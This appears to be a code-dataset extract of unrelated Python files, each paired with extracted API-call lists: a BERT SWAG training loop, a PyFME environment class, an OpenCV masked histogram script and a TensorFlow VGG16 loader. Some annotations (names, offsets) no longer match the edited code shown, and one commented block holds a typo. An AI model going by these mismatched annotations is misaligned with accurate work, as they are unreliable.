    result_dir = os.path.join(args.result_dir, args.model_name)
    log_dir = os.path.join(args.logdir, args.model_name)
    utils.create_chkp_result_dirs(checkpoint_dir, result_dir, log_dir, args)
    writer = SummaryWriter(log_dir=log_dir)
    utils.set_random_seed(args.seed)
    wandb = utils.initialize_wandb(args)
    # Multi-GPU
    # NOTE(review): if no GPU is visible, n_gpu == 0 makes batch_size 0 and
    # the val_freq division raises ZeroDivisionError -- presumably this
    # script is only run on GPU machines; confirm.
    os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu_ids
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
    args.n_gpu = torch.cuda.device_count()
    args.batch_size = args.batch_size * args.n_gpu
    print("device:", device, "n_gpu:", args.n_gpu, "Batch:size", args.batch_size)
    args.val_freq = int(args.val_freq / args.n_gpu)
    # Model
    knowledge_tuples = {}
    kwargs = {"knowledge_method": args.knowledge_method}
    if args.knowledge_method == 1:
        kwargs["cluster_path"] = "./data/transE_clusters.pkl"
    model = BertForMultipleChoice.from_pretrained("bert-base-uncased", **kwargs)
    text_encoder = BertTokenizer.from_pretrained("bert-base-uncased")
    print("Loaded Model from pretrained")
    model.to(device)
    if args.n_gpu > 1:
        model = torch.nn.DataParallel(model)
    # for param in model.named_parameters():
    #     if "classifier" not in param[0]:
    #         param[1].requires_grad = False
    # Data and dataloaders
    dataset_train, dataset_val = get_swag_data(
        args.data_dir, text_encoder, args.num_validation_samples
    )
    train_loader = torch.utils.data.DataLoader(
        dataset_train,
        batch_size=args.batch_size,
        pin_memory=True,
        num_workers=4,
        shuffle=True,
    )
    val_loader = torch.utils.data.DataLoader(
        dataset_val,
        batch_size=args.batch_size,
        pin_memory=True,
        num_workers=4,
        shuffle=False,
    )
    # Optimizer
    # TODO: Should we use warmup etc. Shift to transformer optimizer that can handle all this
    # To keep effective batch-size 32 as per hugging_face examples
    args.gradient_accumulation_steps = int(16 / args.batch_size)
    # HuggingFace convention: no weight decay on biases or LayerNorm weights.
    no_decay = ["bias", "LayerNorm.weight"]
    optimizer_grouped_parameters = [
        {
            "params": [
                p
                for n, p in model.named_parameters()
                if not any(nd in n for nd in no_decay)
            ],
            "weight_decay": args.weight_decay,
        },
        {
            "params": [
                p
                for n, p in model.named_parameters()
                if any(nd in n for nd in no_decay)
            ],
            "weight_decay": 0.0,
        },
    ]
    optimizer = AdamW(optimizer_grouped_parameters, lr=args.lr, eps=args.adam_epsilon)
    t_total = len(train_loader) // args.gradient_accumulation_steps * args.num_epochs
    scheduler = get_linear_schedule_with_warmup(
        optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total
    )
    criterion = torch.nn.CrossEntropyLoss(reduction="mean")
    model.train()
    # Training
    iternum = 0
    best_perf = -1
    best_iter = 0
    for epoch in range(args.num_epochs):
        for data, label, attention_masks in tqdm(train_loader, desc="Train_Epoch"):
            data = data.to(device)
            label = label.to(device)
            attention_masks = attention_masks.to(device)
            output = model(input_ids=data, attention_mask=attention_masks)
            logits = output[0]
            loss = criterion(logits, label)
            if args.gradient_accumulation_steps > 1:
                loss = loss / args.gradient_accumulation_steps
            loss.backward()
            # Step only every `gradient_accumulation_steps` mini-batches.
            if iternum % args.gradient_accumulation_steps == 0:
                optimizer.step()
                scheduler.step()  # Update learning rate schedule
                # scheduler.step()  # Update learning rate schedule
                optimizer.zero_grad()
            # optimizer.zero_grad()
            # optimizer.step()
            writer.add_scalar("loss", loss.item(), iternum)
            writer.add_scalar("lr", scheduler.get_lr()[0], iternum)
            # Periodic validation
            if np.mod(iternum, args.val_freq) == 0 and iternum > 0:
                acc, scores_test, labels_test = evaluate_accuracy(
                    model, val_loader, device
                )
                tqdm.write(f"Accuracy at {iternum} is {acc:.2f}")
                writer.add_scalar("acc", acc, iternum)
                model.train()
                result_filename = os.path.join(result_dir, f"{iternum}.npy")
                np.save(result_filename, acc)
                # NOTE(review): this logs best_perf/best_iter *before* they are
                # updated below, so wandb lags one validation round -- confirm
                # whether that is intentional.
                if wandb is not None:
                    wandb.run.summary["best_accuracy"] = best_perf
                    wandb.run.summary["best_iter"] = best_iter
                # Save For Debug Info
                """
                f = open(result_filename.replace("npy", "json"), "w")
                prediction = scores_test.argmax(-1)
                sep_token_id = text_encoder.sep_token_id
                for ii in range(100):
                    tmp_data = {}
                    data_tx, label, _ = dataset_val[ii]
                    data_tx = data_tx.numpy()
                    position_sep_token = (
                        (data_tx[0] == sep_token_id).nonzero()[0].tolist()
                    )
                    tmp_data["context"] = text_encoder.decode(
                        data_tx[0, : position_sep_token[0]]
                    )
                    tmp_data["question"] = text_encoder.decode(
                        data_tx[0, position_sep_token[0] + 1 : position_sep_token[1]]
                    )
                    answers = []
                    f or jj in range(4):
                        position_sep_token = (
                            (data_tx[jj] == sep_token_id).nonzero()[0].tolist()
                        )
                        answers.append(
                            text_encoder.decode(
                                data_tx[jj][
                                    position_sep_token[1] + 1 : position_sep_token[2]
                                ]
                            )
                        )
                    tmp_data["answers"] = answers
                    tmp_data["gnd_label"] = [label.item()]
                    tmp_data["pred_label"] = [prediction[ii].item()]
                    json.dump(tmp_data, f, indent=True)
                f.close()
                """
                if acc > best_perf:
                    best_perf = acc
                    best_iter = iternum
                    if args.save:
                        checkpoint = {
                            # Fixed: call state_dict() -- the original stored
                            # the bound method itself, not the model weights,
                            # making the checkpoint unloadable.
                            "state_dict": model.state_dict(),
                            "args": args,
                            "best_iter": best_iter,
                            "best_perf": best_perf,
                        }
                        torch.save(checkpoint, os.path.join(checkpoint_dir, "best.pt"))
            iternum += 1
    print("Finish Epoch")
| [
"torch.cuda.device_count",
"os.path.join",
"torch.utils.data.DataLoader",
"utils.set_random_seed",
"torch.utils.tensorboard.SummaryWriter",
"utils.initialize_wandb",
"tqdm.tqdm",
"numpy.save",
"datasets.get_swag_data",
"numpy.mod",
"evaluation.evaluate_accuracy",
"transformers.BertTokenizer.fr... | [((443, 466), 'utils.parse_arguments', 'utils.parse_arguments', ([], {}), '()\n', (464, 466), False, 'import utils\n'), ((488, 538), 'os.path.join', 'os.path.join', (['args.checkpoint_dir', 'args.model_name'], {}), '(args.checkpoint_dir, args.model_name)\n', (500, 538), False, 'import os\n'), ((556, 602), 'os.path.join', 'os.path.join', (['args.result_dir', 'args.model_name'], {}), '(args.result_dir, args.model_name)\n', (568, 602), False, 'import os\n'), ((617, 659), 'os.path.join', 'os.path.join', (['args.logdir', 'args.model_name'], {}), '(args.logdir, args.model_name)\n', (629, 659), False, 'import os\n'), ((664, 736), 'utils.create_chkp_result_dirs', 'utils.create_chkp_result_dirs', (['checkpoint_dir', 'result_dir', 'log_dir', 'args'], {}), '(checkpoint_dir, result_dir, log_dir, args)\n', (693, 736), False, 'import utils\n'), ((750, 780), 'torch.utils.tensorboard.SummaryWriter', 'SummaryWriter', ([], {'log_dir': 'log_dir'}), '(log_dir=log_dir)\n', (763, 780), False, 'from torch.utils.tensorboard import SummaryWriter\n'), ((785, 817), 'utils.set_random_seed', 'utils.set_random_seed', (['args.seed'], {}), '(args.seed)\n', (806, 817), False, 'import utils\n'), ((830, 858), 'utils.initialize_wandb', 'utils.initialize_wandb', (['args'], {}), '(args)\n', (852, 858), False, 'import utils\n'), ((1021, 1046), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (1044, 1046), False, 'import torch\n'), ((1439, 1507), 'modeling_bert.BertForMultipleChoice.from_pretrained', 'BertForMultipleChoice.from_pretrained', (['"""bert-base-uncased"""'], {}), "('bert-base-uncased', **kwargs)\n", (1476, 1507), False, 'from modeling_bert import BertForMultipleChoice\n'), ((1527, 1577), 'transformers.BertTokenizer.from_pretrained', 'BertTokenizer.from_pretrained', (['"""bert-base-uncased"""'], {}), "('bert-base-uncased')\n", (1556, 1577), False, 'from transformers import BertTokenizer, AdamW, get_linear_schedule_with_warmup\n'), 
((1903, 1974), 'datasets.get_swag_data', 'get_swag_data', (['args.data_dir', 'text_encoder', 'args.num_validation_samples'], {}), '(args.data_dir, text_encoder, args.num_validation_samples)\n', (1916, 1974), False, 'from datasets import get_swag_data\n'), ((2008, 2128), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset_train'], {'batch_size': 'args.batch_size', 'pin_memory': '(True)', 'num_workers': '(4)', 'shuffle': '(True)'}), '(dataset_train, batch_size=args.batch_size,\n pin_memory=True, num_workers=4, shuffle=True)\n', (2035, 2128), False, 'import torch\n'), ((2189, 2308), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset_val'], {'batch_size': 'args.batch_size', 'pin_memory': '(True)', 'num_workers': '(4)', 'shuffle': '(False)'}), '(dataset_val, batch_size=args.batch_size,\n pin_memory=True, num_workers=4, shuffle=False)\n', (2216, 2308), False, 'import torch\n'), ((3146, 3216), 'transformers.AdamW', 'AdamW', (['optimizer_grouped_parameters'], {'lr': 'args.lr', 'eps': 'args.adam_epsilon'}), '(optimizer_grouped_parameters, lr=args.lr, eps=args.adam_epsilon)\n', (3151, 3216), False, 'from transformers import BertTokenizer, AdamW, get_linear_schedule_with_warmup\n'), ((3319, 3430), 'transformers.get_linear_schedule_with_warmup', 'get_linear_schedule_with_warmup', (['optimizer'], {'num_warmup_steps': 'args.warmup_steps', 'num_training_steps': 't_total'}), '(optimizer, num_warmup_steps=args.\n warmup_steps, num_training_steps=t_total)\n', (3350, 3430), False, 'from transformers import BertTokenizer, AdamW, get_linear_schedule_with_warmup\n'), ((3456, 3499), 'torch.nn.CrossEntropyLoss', 'torch.nn.CrossEntropyLoss', ([], {'reduction': '"""mean"""'}), "(reduction='mean')\n", (3481, 3499), False, 'import torch\n'), ((1680, 1708), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model'], {}), '(model)\n', (1701, 1708), False, 'import torch\n'), ((3672, 3710), 'tqdm.tqdm', 'tqdm', (['train_loader'], {'desc': 
'"""Train_Epoch"""'}), "(train_loader, desc='Train_Epoch')\n", (3676, 3710), False, 'from tqdm import tqdm\n'), ((966, 991), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (989, 991), False, 'import torch\n'), ((4723, 4767), 'evaluation.evaluate_accuracy', 'evaluate_accuracy', (['model', 'val_loader', 'device'], {}), '(model, val_loader, device)\n', (4740, 4767), False, 'from evaluation import evaluate_accuracy\n'), ((4822, 4871), 'tqdm.tqdm.write', 'tqdm.write', (['f"""Accuracy at {iternum} is {acc:.2f}"""'], {}), "(f'Accuracy at {iternum} is {acc:.2f}')\n", (4832, 4871), False, 'from tqdm import tqdm\n'), ((4991, 5033), 'os.path.join', 'os.path.join', (['result_dir', 'f"""{iternum}.npy"""'], {}), "(result_dir, f'{iternum}.npy')\n", (5003, 5033), False, 'import os\n'), ((5050, 5079), 'numpy.save', 'np.save', (['result_filename', 'acc'], {}), '(result_filename, acc)\n', (5057, 5079), True, 'import numpy as np\n'), ((4622, 4652), 'numpy.mod', 'np.mod', (['iternum', 'args.val_freq'], {}), '(iternum, args.val_freq)\n', (4628, 4652), True, 'import numpy as np\n'), ((7400, 7439), 'os.path.join', 'os.path.join', (['checkpoint_dir', '"""best.pt"""'], {}), "(checkpoint_dir, 'best.pt')\n", (7412, 7439), False, 'import os\n')] |
"""
Python Flight Mechanics Engine (PyFME).
Copyright (c) AeroPython Development Team.
Distributed under the terms of the MIT License.
"""
from pyfme.utils.anemometry import tas2eas, tas2cas, calculate_alpha_beta_TAS
from collections import namedtuple
# Conditions class
# Immutable record of the atmospheric/aerodynamic quantities returned by
# Environment.calculate_aero_conditions (speeds, air properties, flow
# angles and the gravity vector).
Conditions = namedtuple('conditions', ['TAS','CAS','Mach','q_inf',
                          'rho','T','P','a','alpha',
                          'beta','gravity_vector'])
from pyfme.environment.atmosphere import SeaLevel
from pyfme.environment.wind import NoWind
from pyfme.environment.gravity import VerticalConstant
import numpy as np
class Environment(object):
    """
    Aggregates the environment models: atmosphere, gravity and wind.
    """

    def __init__(self, atmosphere=None, gravity=None, wind=None):
        """
        Parameters
        ----------
        atmosphere : Atmosphere
            Atmospheric model (sea-level atmosphere when not given).
        gravity : Gravity
            Gravity model (constant vertical gravity when not given).
        wind : Wind
            Wind or gust model (no wind when not given).
        """
        # ``x or default()`` mirrors the truthiness test of the original.
        self.atmosphere = atmosphere or SeaLevel()
        self.gravity = gravity or VerticalConstant()
        self.wind = wind or NoWind()

    def gravity_magnitude(self, state):
        """Magnitude of gravity at *state* (delegates to the gravity model)."""
        return self.gravity.magnitude(state)

    def gravity_vector(self, state):
        """Gravity vector at *state* (delegates to the gravity model)."""
        return self.gravity.vector(state)

    def horizon_wind(self, state):
        """Wind at *state* expressed in the local-horizon frame."""
        return self.wind.horizon(state)

    def body_wind(self, state):
        """Wind at *state* expressed in the body frame."""
        return self.wind.body(state)

    def calculate_aero_conditions(self, state):
        """Evaluate atmospheric and aerodynamic quantities for *state*.

        Returns a ``Conditions`` namedtuple: (TAS, CAS, Mach, q_inf, rho,
        T, P, a, alpha, beta, gravity_vector).
        """
        body_wind = self.body_wind(state)
        T, P, rho, a = self.atmosphere.variables(state)
        # Aerodynamic velocity: motion relative to the surrounding air.
        aero_vel = state.velocity - body_wind
        alpha, beta, TAS = calculate_alpha_beta_TAS(aero_vel)
        CAS = tas2cas(TAS, P, rho)
        EAS = tas2eas(TAS, rho)  # computed but unused, kept for parity
        Mach = TAS / a
        q_inf = 0.5 * rho * np.square(TAS)
        gravity_vector = self.gravity_vector(state)
        return Conditions(TAS, CAS, Mach, q_inf, rho, T, P, a, alpha,
                          beta, gravity_vector)
| [
"pyfme.utils.anemometry.calculate_alpha_beta_TAS",
"pyfme.utils.anemometry.tas2eas",
"pyfme.utils.anemometry.tas2cas",
"pyfme.environment.wind.NoWind",
"pyfme.environment.gravity.VerticalConstant",
"numpy.square",
"pyfme.environment.atmosphere.SeaLevel",
"collections.namedtuple"
] | [((292, 410), 'collections.namedtuple', 'namedtuple', (['"""conditions"""', "['TAS', 'CAS', 'Mach', 'q_inf', 'rho', 'T', 'P', 'a', 'alpha', 'beta',\n 'gravity_vector']"], {}), "('conditions', ['TAS', 'CAS', 'Mach', 'q_inf', 'rho', 'T', 'P',\n 'a', 'alpha', 'beta', 'gravity_vector'])\n", (302, 410), False, 'from collections import namedtuple\n'), ((1921, 1955), 'pyfme.utils.anemometry.calculate_alpha_beta_TAS', 'calculate_alpha_beta_TAS', (['aero_vel'], {}), '(aero_vel)\n', (1945, 1955), False, 'from pyfme.utils.anemometry import tas2eas, tas2cas, calculate_alpha_beta_TAS\n'), ((2022, 2042), 'pyfme.utils.anemometry.tas2cas', 'tas2cas', (['TAS', 'P', 'rho'], {}), '(TAS, P, rho)\n', (2029, 2042), False, 'from pyfme.utils.anemometry import tas2eas, tas2cas, calculate_alpha_beta_TAS\n'), ((2058, 2075), 'pyfme.utils.anemometry.tas2eas', 'tas2eas', (['TAS', 'rho'], {}), '(TAS, rho)\n', (2065, 2075), False, 'from pyfme.utils.anemometry import tas2eas, tas2cas, calculate_alpha_beta_TAS\n'), ((1133, 1143), 'pyfme.environment.atmosphere.SeaLevel', 'SeaLevel', ([], {}), '()\n', (1141, 1143), False, 'from pyfme.environment.atmosphere import SeaLevel\n'), ((1192, 1210), 'pyfme.environment.gravity.VerticalConstant', 'VerticalConstant', ([], {}), '()\n', (1208, 1210), False, 'from pyfme.environment.gravity import VerticalConstant\n'), ((1250, 1258), 'pyfme.environment.wind.NoWind', 'NoWind', ([], {}), '()\n', (1256, 1258), False, 'from pyfme.environment.wind import NoWind\n'), ((2129, 2143), 'numpy.square', 'np.square', (['TAS'], {}), '(TAS)\n', (2138, 2143), True, 'import numpy as np\n')] |
#Histograms -->allow to visualize distribution of pixel intensity of an image (grayscale or RGB)
import cv2 as cv
import matplotlib.pyplot as plt
import numpy as np
# Load the source image and build a circular mask around its centre.
source = cv.imread('Photos/cats.jpg')
canvas = np.zeros(source.shape[:2], dtype=np.uint8)
circle_mask = cv.circle(canvas, (source.shape[1] // 2, source.shape[0] // 2),
                       100, 255, -1)
roi = cv.bitwise_and(source, source, mask=circle_mask)
cv.imshow("Masked image", roi)

# Per-channel (B, G, R) intensity histograms restricted to the masked region.
plt.figure()
plt.title("Color histogram")
plt.xlabel("Bins")
plt.ylabel("No. of pixels")
for channel, colour in enumerate(('b', 'g', 'r')):
    channel_hist = cv.calcHist([source], [channel], circle_mask, [256], [0, 256])
    plt.plot(channel_hist, color=colour)
    plt.xlim([0, 256])
plt.show()

cv.waitKey(0)
cv.destroyAllWindows()
cv.destroyAllWindows() | [
"matplotlib.pyplot.title",
"matplotlib.pyplot.xlim",
"cv2.circle",
"matplotlib.pyplot.show",
"cv2.bitwise_and",
"matplotlib.pyplot.plot",
"cv2.waitKey",
"cv2.destroyAllWindows",
"cv2.calcHist",
"numpy.zeros",
"cv2.imread",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.ylabel",
"cv2.imshow... | [((248, 276), 'cv2.imread', 'cv.imread', (['"""Photos/cats.jpg"""'], {}), "('Photos/cats.jpg')\n", (257, 276), True, 'import cv2 as cv\n'), ((385, 424), 'numpy.zeros', 'np.zeros', (['img.shape[:2]'], {'dtype': 'np.uint8'}), '(img.shape[:2], dtype=np.uint8)\n', (393, 424), True, 'import numpy as np\n'), ((1029, 1099), 'cv2.circle', 'cv.circle', (['blank', '(img.shape[1] // 2, img.shape[0] // 2)', '(100)', '(255)', '(-1)'], {}), '(blank, (img.shape[1] // 2, img.shape[0] // 2), 100, 255, -1)\n', (1038, 1099), True, 'import cv2 as cv\n'), ((1100, 1135), 'cv2.bitwise_and', 'cv.bitwise_and', (['img', 'img'], {'mask': 'mask'}), '(img, img, mask=mask)\n', (1114, 1135), True, 'import cv2 as cv\n'), ((1134, 1167), 'cv2.imshow', 'cv.imshow', (['"""Masked image"""', 'masked'], {}), "('Masked image', masked)\n", (1143, 1167), True, 'import cv2 as cv\n'), ((1168, 1180), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1178, 1180), True, 'import matplotlib.pyplot as plt\n'), ((1181, 1209), 'matplotlib.pyplot.title', 'plt.title', (['"""Color histogram"""'], {}), "('Color histogram')\n", (1190, 1209), True, 'import matplotlib.pyplot as plt\n'), ((1210, 1228), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Bins"""'], {}), "('Bins')\n", (1220, 1228), True, 'import matplotlib.pyplot as plt\n'), ((1229, 1256), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""No. of pixels"""'], {}), "('No. 
of pixels')\n", (1239, 1256), True, 'import matplotlib.pyplot as plt\n'), ((1417, 1427), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1425, 1427), True, 'import matplotlib.pyplot as plt\n'), ((1429, 1442), 'cv2.waitKey', 'cv.waitKey', (['(0)'], {}), '(0)\n', (1439, 1442), True, 'import cv2 as cv\n'), ((1443, 1465), 'cv2.destroyAllWindows', 'cv.destroyAllWindows', ([], {}), '()\n', (1463, 1465), True, 'import cv2 as cv\n'), ((1323, 1369), 'cv2.calcHist', 'cv.calcHist', (['[img]', '[i]', 'mask', '[256]', '[0, 256]'], {}), '([img], [i], mask, [256], [0, 256])\n', (1334, 1369), True, 'import cv2 as cv\n'), ((1369, 1394), 'matplotlib.pyplot.plot', 'plt.plot', (['hist'], {'color': 'col'}), '(hist, color=col)\n', (1377, 1394), True, 'import matplotlib.pyplot as plt\n'), ((1398, 1416), 'matplotlib.pyplot.xlim', 'plt.xlim', (['[0, 256]'], {}), '([0, 256])\n', (1406, 1416), True, 'import matplotlib.pyplot as plt\n')] |
"""A pre-trained implimentation of VGG16 with weights trained on ImageNet.
NOTE: It's not a great idea to use tf.constant to take in large arrays that will
not change, better to use a non-trainable variable.
https://stackoverflow.com/questions/41150741/in-tensorflow-what-is-the-difference-between-a-constant-and-a-non-trainable-var?rq=1
"""
##########################################################################
# Special thanks to
# http://www.cs.toronto.edu/~frossard/post/vgg16/
# for converting the caffe VGG16 pre-trained weights to TensorFlow
# this file is essentially just a restylized version of his vgg16.py
##########################################################################
from __future__ import print_function, absolute_import, division
import os
import numpy as np
from scipy.misc import imread, imresize
import tensorflow as tf
# When True, the __main__ demo below uses tf.InteractiveSession instead of
# tf.Session.
_debug = False
def pretrained_conv_layer(name, input_tensor, params):
    r"""Creates a stride-1, SAME-padded convolutional layer from saved weights.

    The filter weights and biases are looked up in ``params`` under the keys
    ``name + '_W'`` and ``name + '_b'`` and frozen into the graph as
    constants (i.e. not trainable).

    Args:
        name: A `str`, the name scope of the layer and the key prefix used
            to find its weights in ``params``.
        input_tensor: A `Tensor`, the input feature map.
        params: A mapping (e.g. a loaded ``.npz`` file) of pre-trained
            weight arrays.

    Returns:
        A `Tensor`: the ReLU activations of the biased convolution.
    """
    with tf.name_scope(name):
        weights = tf.constant(params[name+'_W'])
        biases = tf.constant(params[name+'_b'])
        conv = tf.nn.conv2d(input=input_tensor,
                            filter=weights,
                            strides=[1, 1, 1, 1],
                            padding='SAME',
                            name='convolution')
        preactivations = tf.nn.bias_add(conv, biases, name='bias_addition')
        activations = tf.nn.relu(preactivations, name='activation')
    return activations
def pretrained_fc_layer(name, in_tensor, params, sigmoid=tf.nn.relu):
    """Fully-connected layer built from pre-trained weights.

    Looks up ``name + '_W'`` / ``name + '_b'`` in ``params``, computes
    ``in_tensor @ W + b`` and applies ``sigmoid`` (ReLU by default).
    """
    with tf.name_scope(name):
        w = tf.constant(params[name + '_W'])
        b = tf.constant(params[name + '_b'])
        pre = tf.nn.bias_add(tf.matmul(in_tensor, w), b)
        return sigmoid(pre, name='activation')
class PreTrainedVGG16:
    """VGG16 with weights pre-trained on ImageNet.

    The TensorFlow graph is built at construction time from a converted
    ``.npz`` weight file.  The session is kept on the instance so the
    inference helpers do not depend on module-level globals.
    """

    def __init__(self, weights=None, session=None):
        """Build the VGG16 graph.

        Args:
            weights: Path to the converted ``vgg16_weights.npz`` file.
            session: A TF session used by ``get_output``/``get_activations``.
        """
        if weights is not None and session is not None:
            self.parameters = np.load(weights)
        # Fixed: keep the session on the instance; previously the inference
        # helpers reached for the module-level globals ``sess``/``vgg`` set
        # up only by the __main__ demo.
        self.session = session
        self.input_images = tf.placeholder(tf.float32, (None, 224, 224, 3))
        self.activations = self._build_graph()
        self.output = self.activations['fc8']

    @staticmethod
    def get_class_names():
        """Return the class names, one per line of 'ImageNet_Classes.txt'."""
        with open('ImageNet_Classes.txt') as names_file:
            return [l.replace('\n', '') for l in names_file]

    def get_output(self, images, auto_resize=True):
        """Takes a list of images; returns the softmax probabilities of the
        first image in the batch."""
        if auto_resize:
            images_ = [imresize(im, (224, 224)) for im in images]
        else:
            images_ = images
        feed_dict = {self.input_images: images_}
        # Fixed: run on the stored session/graph instead of the globals.
        return self.session.run(self.output, feed_dict)[0]

    def get_activations(self, images, auto_resize=True):
        """Takes a list of images; returns the activation dictionary
        (layer name -> array)."""
        if auto_resize:
            images_ = [imresize(im, (224, 224)) for im in images]
        else:
            images_ = images
        feed_dict = {self.input_images: images_}
        # Fixed: ``self.activations`` is a dict of tensors, so run() returns
        # a dict of arrays -- the old ``[0]`` indexing raised KeyError.
        return self.session.run(self.activations, feed_dict)

    def _build_graph(self):
        """Assemble the VGG16 stack; return a dict of named activations."""
        # pooling arguments
        _ksize = [1, 2, 2, 1]
        _strides = [1, 2, 2, 1]
        # center the input images on the ImageNet channel means
        with tf.name_scope('preprocess_centering'):
            mean = tf.constant([123.68, 116.779, 103.939], dtype=tf.float32,
                               shape=[1, 1, 1, 3], name='img_mean')
            c_images = self.input_images - mean
        # images --> conv1_1 --> conv1_2 --> pool1
        conv1_1 = pretrained_conv_layer('conv1_1', c_images, self.parameters)
        conv1_2 = pretrained_conv_layer('conv1_2', conv1_1, self.parameters)
        pool1 = tf.nn.max_pool(conv1_2, _ksize, _strides, 'SAME', name='pool1')
        # pool1 --> conv2_1 --> conv2_2 --> pool2
        conv2_1 = pretrained_conv_layer('conv2_1', pool1, self.parameters)
        conv2_2 = pretrained_conv_layer('conv2_2', conv2_1, self.parameters)
        pool2 = tf.nn.max_pool(conv2_2, _ksize, _strides, 'SAME', name='pool2')
        # pool2 --> conv3_1 --> conv3_2 --> conv3_3 --> pool3
        conv3_1 = pretrained_conv_layer('conv3_1', pool2, self.parameters)
        conv3_2 = pretrained_conv_layer('conv3_2', conv3_1, self.parameters)
        conv3_3 = pretrained_conv_layer('conv3_3', conv3_2, self.parameters)
        pool3 = tf.nn.max_pool(conv3_3, _ksize, _strides, 'SAME', name='pool3')
        # pool3 --> conv4_1 --> conv4_2 --> conv4_3 --> pool4
        conv4_1 = pretrained_conv_layer('conv4_1', pool3, self.parameters)
        conv4_2 = pretrained_conv_layer('conv4_2', conv4_1, self.parameters)
        conv4_3 = pretrained_conv_layer('conv4_3', conv4_2, self.parameters)
        pool4 = tf.nn.max_pool(conv4_3, _ksize, _strides, 'SAME', name='pool4')
        # pool4 --> conv5_1 --> conv5_2 --> conv5_3 --> pool5
        conv5_1 = pretrained_conv_layer('conv5_1', pool4, self.parameters)
        conv5_2 = pretrained_conv_layer('conv5_2', conv5_1, self.parameters)
        conv5_3 = pretrained_conv_layer('conv5_3', conv5_2, self.parameters)
        pool5 = tf.nn.max_pool(conv5_3, _ksize, _strides, 'SAME', name='pool5')
        # pool5 --> flatten --> fc1 --> fc2 --> fc3 (softmax)
        shape = int(np.prod(pool5.get_shape()[1:]))
        pool5_flat = tf.reshape(pool5, [-1, shape])
        fc1 = pretrained_fc_layer('fc6', pool5_flat, self.parameters)
        fc2 = pretrained_fc_layer('fc7', fc1, self.parameters)
        fc3 = pretrained_fc_layer('fc8', fc2, self.parameters, tf.nn.softmax)
        activations = {
            'conv1_1': conv1_1, 'conv1_2': conv1_2, 'pool1': pool1,
            'conv2_1': conv2_1, 'conv2_2': conv2_2, 'pool2': pool2,
            'conv3_1': conv3_1, 'conv3_2': conv3_2, 'conv3_3': conv3_3, 'pool3': pool3,
            'conv4_1': conv4_1, 'conv4_2': conv4_2, 'conv4_3': conv4_3, 'pool4': pool4,
            'conv5_1': conv5_1, 'conv5_2': conv5_2, 'conv5_3': conv5_3, 'pool5': pool5,
            'fc6': fc1, 'fc7': fc2, 'fc8': fc3
        }
        return activations
if __name__ == '__main__':
    # Demo: classify one image with the pre-trained network and report the
    # highest-probability ImageNet classes.
    # Get input
    input_images = [imread('testflash.jpg', mode='RGB')]
    # Check 'vgg16_weights.npz exists
    if not os.path.isfile('vgg16_weights.npz'):
        raise Exception(
            "The weights I use here were converted from the Caffe Model Zoo "
            "weights by <NAME>. He didn't include a license so I'm "
            "hesistant to re-post them. Please download them from his "
            "website:\nhttp://www.cs.toronto.edu/~frossard/post/vgg16/")
    # Build VGG16
    if _debug:
        sess = tf.InteractiveSession()
    else:
        sess = tf.Session()
    vgg = PreTrainedVGG16('vgg16_weights.npz', sess)
    # Run images through network, return softmax probabilities
    from time import time
    a = time()
    class_probabilities = vgg.get_output(input_images)
    print(time()-a)  # wall-clock seconds for one forward pass
    # Get Class Names
    class_names = vgg.get_class_names()
    # Report results
    # NOTE(review): named top5 but it slices the ten best classes.
    top5 = (np.argsort(class_probabilities)[::-1])[0:10]
    with open('results.txt', 'w') as f:
        for p in np.argsort(class_probabilities)[::-1]:
            f.write(str(class_probabilities[p]) + ' : ' + class_names[p] + '\n')
    for p in top5:
        print(class_probabilities[p], ' : ', class_names[p])
| [
"numpy.load",
"tensorflow.nn.relu",
"tensorflow.reshape",
"tensorflow.Session",
"tensorflow.constant",
"time.time",
"numpy.argsort",
"tensorflow.placeholder",
"tensorflow.nn.max_pool",
"scipy.misc.imread",
"os.path.isfile",
"tensorflow.nn.conv2d",
"tensorflow.matmul",
"scipy.misc.imresize"... | [((7226, 7232), 'time.time', 'time', ([], {}), '()\n', (7230, 7232), False, 'from time import time\n'), ((1296, 1315), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (1309, 1315), True, 'import tensorflow as tf\n'), ((1335, 1367), 'tensorflow.constant', 'tf.constant', (["params[name + '_W']"], {}), "(params[name + '_W'])\n", (1346, 1367), True, 'import tensorflow as tf\n'), ((1383, 1415), 'tensorflow.constant', 'tf.constant', (["params[name + '_b']"], {}), "(params[name + '_b'])\n", (1394, 1415), True, 'import tensorflow as tf\n'), ((1430, 1540), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', ([], {'input': 'input_tensor', 'filter': 'weights', 'strides': '[1, 1, 1, 1]', 'padding': '"""SAME"""', 'name': '"""convolution"""'}), "(input=input_tensor, filter=weights, strides=[1, 1, 1, 1],\n padding='SAME', name='convolution')\n", (1442, 1540), True, 'import tensorflow as tf\n'), ((1675, 1725), 'tensorflow.nn.bias_add', 'tf.nn.bias_add', (['conv', 'biases'], {'name': '"""bias_addition"""'}), "(conv, biases, name='bias_addition')\n", (1689, 1725), True, 'import tensorflow as tf\n'), ((1748, 1793), 'tensorflow.nn.relu', 'tf.nn.relu', (['preactivations'], {'name': '"""activation"""'}), "(preactivations, name='activation')\n", (1758, 1793), True, 'import tensorflow as tf\n'), ((1898, 1917), 'tensorflow.name_scope', 'tf.name_scope', (['name'], {}), '(name)\n', (1911, 1917), True, 'import tensorflow as tf\n'), ((1937, 1969), 'tensorflow.constant', 'tf.constant', (["params[name + '_W']"], {}), "(params[name + '_W'])\n", (1948, 1969), True, 'import tensorflow as tf\n'), ((1985, 2017), 'tensorflow.constant', 'tf.constant', (["params[name + '_b']"], {}), "(params[name + '_b'])\n", (1996, 2017), True, 'import tensorflow as tf\n'), ((2392, 2439), 'tensorflow.placeholder', 'tf.placeholder', (['tf.float32', '(None, 224, 224, 3)'], {}), '(tf.float32, (None, 224, 224, 3))\n', (2406, 2439), True, 'import 